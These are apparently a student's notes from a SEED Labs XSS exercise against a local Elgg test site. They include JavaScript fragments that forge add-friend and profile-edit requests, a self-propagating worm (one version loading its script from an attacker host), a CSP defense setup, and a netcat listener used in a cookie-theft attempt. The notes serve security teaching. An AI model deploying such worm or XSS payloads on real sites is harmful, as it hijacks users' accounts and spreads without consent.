seed lab - web security 2 - xss lab

1. Lab Setup

same as csrf lab.

2. xss Attack - add friend

2.1 Vim “xssaddfriend.txt”

var sendurl=“http://www.xsslabelgg.com/action/friends/add”+"?friend=47"+token+ts;
Ajax.open(“GET”,sendurl,true);

2.2 Open www.xsslabelgg.com.

Login as Samy/seedsamy.
edit profile about : copy and paste, save

2.3 Alice visit members - Samy

Login as Alice/seedalice, browse members samy, then samy is added as a friend automatically.

3. xss Attack- edit profile

3.1 vim xsseditprofile.txt

var desc="&description=Samy is hero" + “&accesslevel[description]=2”;
var sendurl=“http://www.xsslabelgg.com/action/profile/edit”;
var content = token + ts + name +desc + guid;
Ajax.open(“POST”,sendurl,true);
Ajax.send(content);

3.2 open www.xsslabelgg.com

Login as Samy/seedsamy. edit profile about : copy and paste, save.

3.3 Alice visit members - Samy

Login as Alice/alice, to see her profile-about is blank. When click members - samy, then Alice will see “Samy is hero ” has been added to her profile-about.

4. self propagating xss worm

4.1 DOM approach

var headerTag = “<script id =“xssworm” type = “text/javascript”> “;
var jsCode = document.getElementById(“xssworm”).innerHTML;
var tailTag = “</” + “script>”;
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag );
var desc=”&description=Samy is hero” + wormCode + “&accesslevel[description]=2”;

4.2 link approach

4.2.1 edit xsswormurl.js
var wormCode = encodeURIComponent( "<script type =“text/javascript” " + “id = “xssworm” " + “src=“http://www.csrflabattacker.com/xsswormurl.js”> " +
“</” + “script>”);
var desc=”&description=Samy is hero” + wormCode + “&accesslevel[description]=2”;
4.2.2 cp xsswormurl.js /var/www/CSRF/Attacker/
4.2.3 edit profile about of Samy
src=“http://www.csrflabattacker.com/xsswormurl.js”

5. defeating XSS using CSP

5.1 download csp.zip from seed lab

https://seedsecuritylabs.org/Labs_16.04/Web/Web_XSS_Elgg/files/csp.zip

5.2 Run a simple web server

vim xss_http_server.py
#!/usr/bin/env python3 //shebang
*self.send_header(’Content-Security-Policy’,
“default-src ’self’;”
"script-src ’self’ .example68.com:8000 ’nonce-1rA2345’ ")
$python3 xss_http_server.py

5.3 Run csptest in firefox

vim /etc/hosts to include the 3 exanmple sites 32 68 79
http://www.example32.com:8000/csptest.html
http://www.example68.com:8000/csptest.html
http://www.example79.com:8000/csptest.html

5.4 Change xss_http_server.py

to see how the 3 urls page view changed, such as:

6. others

6.1 stealing cookies not work

put the code in alice profile about:

$ nc -l 5555 -v
not work. why?

6.2 shebang

#! pronounces “shebang”,
The #! syntax used in scripts to indicate an interpreter for execution . Most Linux shell and perl / python script starts with the following line:
#! /bin/bash
or
#! /usr/bin/python3